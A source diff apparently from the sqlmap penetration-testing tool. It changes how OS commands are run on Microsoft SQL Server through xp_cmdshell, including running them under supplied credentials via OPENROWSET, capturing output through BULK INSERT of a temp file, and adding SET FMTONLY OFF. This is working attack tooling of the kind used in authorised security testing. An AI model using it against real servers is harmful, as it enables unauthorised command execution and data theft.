diff --git a/lib/core/agent.py b/lib/core/agent.py
index bb8cad288..bd2204000 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -820,15 +820,6 @@ class Agent:
 
     def runAsDBMSUser(self, query):
         if conf.dCred and "Ad Hoc Distributed Queries" not in query:
-            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
-                for sqlStatement in sqlStatements:
-                    if query.lower().startswith(sqlStatement):
-                        sqlType = sqlTitle
-                        break
-
-            if sqlType and "SELECT" not in sqlType:
-                query = "SELECT %d;%s" % (randomInt(), query)
-
             query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
 
         return query
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 6e28f5028..1203bd876 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -148,12 +148,18 @@ class xp_cmdshell:
             self.xpCmdshellExecCmd(cmd)
 
     def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
+        if conf.dCred:
+            self.tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True))
+            cmd = "%s > \"%s\"" % (cmd, self.tmpFile)
+
         self.__randStr = randomStr(lowercase=True)
         self.__cmd = "0x%s" % hexencode(cmd)
         self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
-        if insertIntoTable:
+
+        if insertIntoTable and not conf.dCred:
             self.__forgedCmd += "INSERT INTO %s " % insertIntoTable
+
         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
         return agent.runAsDBMSUser(self.__forgedCmd)
@@ -178,6 +184,11 @@ class xp_cmdshell:
                 output = new_output
         else:
             inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName))
+
+            if conf.dCred:
+                inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10)))
+                self.delRemoteFile(self.tmpFile)
+
             query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
 
             if conf.direct or any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)):
diff --git a/procs/mssqlserver/run_statement_as_user.txt b/procs/mssqlserver/run_statement_as_user.txt
index 46842737c..575c22ef5 100644
--- a/procs/mssqlserver/run_statement_as_user.txt
+++ b/procs/mssqlserver/run_statement_as_user.txt
@@ -1,2 +1,3 @@
-SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')
-# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')
+SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')